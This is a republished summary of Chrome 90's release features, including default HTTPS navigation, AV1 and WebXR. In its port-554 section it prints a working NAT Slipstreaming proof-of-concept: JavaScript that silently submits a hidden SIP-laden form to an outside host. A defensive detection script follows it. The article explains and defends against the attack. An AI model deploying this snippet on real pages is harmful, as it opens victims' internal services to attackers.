What’s New in Chrome 90? HTTPS Default, AV1 Encoder, WebXR & Security Updates

Chrome 90, released on April 13, 2021, introduces 23 new features, including default HTTPS navigation, an AV1 video encoder for WebRTC, the WebXR Depth API and AR lighting estimation, and the blocking of HTTP port 554 to mitigate NAT Slipstreaming attacks, along with performance and security enhancements for web developers.

Alibaba Terminal Technology

TL;DR

Chrome 90 release date: 2021-04-13

Number of new features: 23 (see Chrome Platform Status for details)

V8 engine version: v9.0

Biggest highlight: default use of HTTPS protocol (still in gradual rollout)

Other interesting features are listed below

A safer default for navigation: HTTPS

Starting with Chrome 90, the browser defaults to opening URLs with HTTPS, changing the classic interview question about what happens after entering a URL.

Previously, entering example.com would first request http://example.com and rely on server redirects. Chrome 90 now directly requests https://example.com.

Testing with kiwenlau.com shows that Chrome 89 initially uses HTTP and receives a 301 redirect, while Chrome 90 still makes the first request over HTTP because the feature is still in a gradual rollout.

To enable the feature manually, go to chrome://flags and set #omnibox-default-typed-navigations-to-https to "Enabled".

Using HTTPS prevents clear‑text transmission, protecting against eavesdropping and tampering, which is fundamental for web security.

AV1 Encoder

AV1 (AOMedia Video 1) is an open, royalty‑free video codec offering 20‑30% better compression than VP9. Major players like Netflix, Facebook, iQIYI, and YouTube’s custom VCU chip support AV1.

For video‑heavy applications, AV1 reduces bandwidth costs dramatically; iQIYI’s 2020 report shows bandwidth expenses accounting for over a third of its losses.

Chrome 90 adds an AV1 encoder for WebRTC, improving compression efficiency, enabling lower‑bitrate video (as low as 30 kbps), and enhancing screen‑sharing performance.

WebXR Depth API and WebXR AR Lighting Estimation

These new WebXR features let developers obtain depth information between the device and real‑world objects and estimate ambient lighting for AR experiences.

WebXR is the API for building AR/VR applications on the web. Example demos such as Sodar (measuring social distance) illustrate its capabilities.

Feature: Block HTTP port 554

Chrome 90 blocks port 554 to mitigate NAT Slipstreaming 2.0 attacks, which allow attackers to bypass local firewalls and reach internal services.

The attack works by embedding malicious JavaScript that crafts a large POST request, causing a NAT device to interpret one of the TCP packets as a SIP REGISTER packet and open a public port to the internal target the attacker is after.

Below is a simplified example of the JavaScript used to trigger the NAT behavior:

// our sip message
var sipmsg = 'REGISTER sip:samy.pl;transport=TCP SIP/2.0\r\n' +
             'Contact: <sip:[email protected]:1234;transport=TCP>\r\n\r\n';

// load form in an iframe so user doesn't see it
var iframe = document.createElement('iframe');
iframe.name = 'iframe';
iframe.style.display = 'none'; // hide the iframe

// create form
var form = document.createElement('form');
form.setAttribute('target', 'iframe'); // load into iframe
form.setAttribute('method', 'POST'); // need the POST area where we can add CRLFs
form.setAttribute('action', 'http://samy.pl:5060'); // "http" server on SIP port 5060
form.setAttribute('enctype', 'multipart/form-data'); // ensure our data doesn't get encoded

var textarea = document.createElement('textarea');
textarea.setAttribute('name', 'textname'); // required
textarea.innerHTML = sipmsg;
form.appendChild(textarea);

document.body.appendChild(iframe);
document.body.appendChild(form);
form.submit();

Blocking the port prevents the immediate exploit, but a comprehensive solution requires proper NAT configuration and strict device passwords.
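
A defender-side check for the pattern described above, as an added example that is not from the original article: it inspects captured outbound payloads for HTTP requests sent to the two ALG-related ports this page mentions (554 and 5060) and for a SIP request line inside an HTTP body. The record shape, hostnames and sample payloads are constructed for illustration.

```javascript
// Added example (not from the article). Ports are the two this page mentions:
// 554 (blocked in Chrome 90) and 5060 (the SIP port in the snippet above).
const ALG_PORTS = new Map([[554, 'RTSP'], [5060, 'SIP']]);

const HTTP_REQUEST_LINE = /^(GET|POST|PUT|HEAD|DELETE|OPTIONS|PATCH) \S+ HTTP\/1\.[01]$/;
// Match a SIP request line only at the start of a line (^ with /m), not mid-text.
const SIP_START_LINE = /^(REGISTER|INVITE|OPTIONS) sips?:\S+ SIP\/2\.0\r?$/m;

// conn = { dstPort, payload }: hypothetical record of one outbound TCP payload.
function inspectEgress(conn) {
  const findings = [];
  const headerEnd = conn.payload.indexOf('\r\n\r\n');
  const head = headerEnd === -1 ? conn.payload : conn.payload.slice(0, headerEnd);
  const body = headerEnd === -1 ? '' : conn.payload.slice(headerEnd + 4);
  // Only HTTP traffic is in scope: genuine SIP/RTSP clients use these ports legitimately.
  if (!HTTP_REQUEST_LINE.test(head.split('\r\n')[0])) return findings;

  if (ALG_PORTS.has(conn.dstPort)) {
    findings.push(`HTTP request to ${ALG_PORTS.get(conn.dstPort)} port ${conn.dstPort}`);
  }
  if (SIP_START_LINE.test(body)) {
    findings.push('SIP request line inside HTTP body');
  }
  return findings;
}

// Constructed sample payloads (multipart form posts, as in the form above).
const boundary = '----constructedBoundary';
const multipart = (value) =>
  `--${boundary}\r\nContent-Disposition: form-data; name="textname"\r\n\r\n` +
  `${value}\r\n--${boundary}--\r\n`;
const request = (host, body) =>
  `POST / HTTP/1.1\r\nHost: ${host}\r\n` +
  `Content-Type: multipart/form-data; boundary=${boundary}\r\n\r\n${body}`;

const SAMPLES = [
  { id: 'benign', dstPort: 80, payload: request('shop.example', multipart('hello')) },
  { id: 'midline', dstPort: 80,
    payload: request('shop.example', multipart('note: REGISTER sip:a.example SIP/2.0')) },
  { id: 'sip-port', dstPort: 5060,
    payload: request('alg.example:5060',
      multipart('REGISTER sip:alg.example;transport=TCP SIP/2.0\r\n')) },
  { id: 'rtsp-port', dstPort: 554, payload: 'GET / HTTP/1.1\r\nHost: cam.example:554\r\n\r\n' },
];

const report = () => SAMPLES.map((s) => ({ id: s.id, findings: inspectEgress(s) }));
console.log(JSON.stringify(report(), null, 2));
```

The port map is limited to the ports named on this page and is not Chrome's full restricted-port list; extend it to match the ALGs enabled on your own NAT devices.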

Summary

The most significant update in Chrome 90 is the default HTTPS navigation, a small yet impactful change that moves the web away from clear‑text HTTP. Additional highlights include the AV1 encoder for WebRTC, new WebXR APIs, and security measures like blocking port 554 to curb NAT Slipstreaming attacks.

While some features may not be immediately useful to all developers, understanding them provides a broader view of modern front‑end capabilities and security considerations.

Republication Notice

This article has been distilled and summarized from source material, then republished for learning and reference. If you believe it infringes your rights, please contact admin@besthub.dev and we will review it promptly.
